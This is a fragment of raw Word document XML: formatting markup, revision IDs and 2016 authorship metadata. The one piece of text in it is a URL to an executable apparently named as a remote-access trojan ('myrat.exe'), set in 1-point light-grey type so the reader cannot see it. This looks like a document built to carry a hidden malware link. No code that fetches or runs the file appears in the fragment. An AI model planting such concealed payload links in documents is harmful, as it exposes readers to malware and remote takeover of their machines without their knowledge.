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03" w:rsidRPr="00357D88" w:rsidRDefault="00F96B03">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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3D4E4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
        <w:t>http://neobankdoor.net/myrat.exe\</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D85293" w:rsidRPr="00357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E"/>
    <w:rsid w:val="00007E3D"/>
    <w:rsid w:val="00055732"/>
    <w:rsid w:val="000569C1"/>
    <w:rsid w:val="000B0421"/>
    <w:rsid w:val="000B1EAF"/>
    <w:rsid w:val="00102CE9"/>
    <w:rsid w:val="001064CE"/>
    <w:rsid w:val="001758CA"/>
    <w:rsid w:val="001859D7"/>
    <w:rsid w:val="00213094"/>
    <w:rsid w:val="002A689B"/>
    <w:rsid w:val="00322C80"/>
    <w:rsid w:val="00355CEF"/>
    <w:rsid w:val="00357D88"/>
    <w:rsid w:val="003C14A3"/>
    <w:rsid w:val="003D4175"/>
    <w:rsid w:val="003D4E4C"/>
    <w:rsid w:val="00400433"/>
    <w:rsid w:val="00401AA9"/>
    <w:rsid w:val="004125C7"/>
    <w:rsid w:val="00423581"/>
    <w:rsid w:val="004C1586"/>
    <w:rsid w:val="004C5421"/>
    <w:rsid w:val="005411F3"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="00610ECB"/>
    <w:rsid w:val="006117C5"/>
    <w:rsid w:val="00617DDC"/>
    <w:rsid w:val="006D6EB6"/>
    <w:rsid w:val="006E0CC5"/>
    <w:rsid w:val="00761EBF"/>
    <w:rsid w:val="007C2BCD"/>
    <w:rsid w:val="00864FBB"/>
    <w:rsid w:val="008742AD"/>
    <w:rsid w:val="00874B96"/>
    <w:rsid w:val="00877FF0"/>
    <w:rsid w:val="00895367"/>
    <w:rsid w:val="009210E2"/>
    <w:rsid w:val="00973140"/>
    <w:rsid w:val="00981292"/>
    <w:rsid w:val="00A01528"/>
    <w:rsid w:val="00A66539"/>
    <w:rsid w:val="00AB08DE"/>
    <w:rsid w:val="00AF3821"/>
    <w:rsid w:val="00BB3BFC"/>
    <w:rsid w:val="00BC6BA3"/>
    <w:rsid w:val="00C055C8"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA154B"/>
    <w:rsid w:val="00CB1B6E"/>
    <w:rsid w:val="00CC2C0D"/>
    <w:rsid w:val="00D23FBB"/>
    <w:rsid w:val="00D45AF6"/>
    <w:rsid w:val="00D85293"/>
    <w:rsid w:val="00E5454C"/>
    <w:rsid w:val="00E6267D"/>
    <w:rsid w:val="00E64850"/>
    <w:rsid w:val="00ED25FE"/>
    <w:rsid w:val="00F571DA"/>
    <w:rsid w:val="00F84440"/>
    <w:rsid w:val="00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1562D-92A3-43B1-AF65-263ACE57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Anna;AnnaS;Fortek</dc:creator>
  <cp:lastModifiedBy>Commandor</cp:lastModifiedBy>
  <cp:revision>107</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-01T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-05T01:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>